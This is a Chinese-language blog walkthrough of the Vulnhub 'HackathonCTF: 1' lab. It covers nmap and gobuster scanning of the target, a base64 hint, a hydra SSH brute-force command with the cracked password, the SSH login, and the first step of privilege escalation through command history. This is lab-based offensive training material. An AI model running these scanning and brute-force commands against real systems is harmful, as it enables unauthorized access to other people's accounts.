Vulnhub-HACKATHONCTF-1

Administrator 字数: 14605 阅读耗时: 36 分钟 2022/11/28 博客独享热度: 7 评论: 0

title: 'Vulnhub-HACKATHONCTF: 1'
tags: Vulnhub
abbrlink: 6be15d5

date: 2022-11-28 11:25:14

描述

Name: HackathonCTF: 1
Date release: 27 Oct 2020
Author: somu sen
Series: HackathonCTF

nmap扫描

存活

kali 192.168.169.220
靶机  192.168.169.230

扫描靶机

21 23 80

访问

80端口

扫描目录

base64解密

c3NoLWJydXRlZm9yY2Utc3Vkb2l0Cg==

ssh-bruteforce-sudoit
应该是提示 ssh连接 爆破 提权

gobuster dir -u http://192.168.169.230/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak

/index.html           (Status: 200) [Size: 227]
/robots.txt           (Status: 200) [Size: 139]
/ftc.html             (Status: 200) [Size: 154]
/sudo.html            (Status: 200) [Size: 281]
/ctf.html             (Status: 200) [Size: 0]

sudo

ctf (空白页面)

ssh看到用户名 test 密码根据提示应该是爆破

ssh

爆破
注意端口

hydra -l test -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.169.230 -s 7223 -f

[7223][ssh] host: 192.168.169.230   login: test   password: jordan23

```
ssh test@192.168.169.230 -p 7223

Linux快速查看和执行历史命令

1. 查询历史命令

ctrl + r 搜索历史命令
ctrl + p 回显上一条历史命令
ctrl + n 回显下一条历史命令

2. 快速重复执行上一条命令

使用上方向键，并回车执行
使用 !! 并回车执行
!-1 并回车执行

3. 查找过去执行过的命令

history | less #预览所有历史命令(不会打印到终端)
history | more #预览所有历史命令(会打印到终端)
history | grep 'cd /var *' #查找包含cd /var字符串的所有历史命令
! <指令序号> #执行该序号所在的命令

```
空执行过的所有命令历史 history -c
~/.bash-history记录了一些有关 root 执行过的命令

提权

查看历史命令

history | less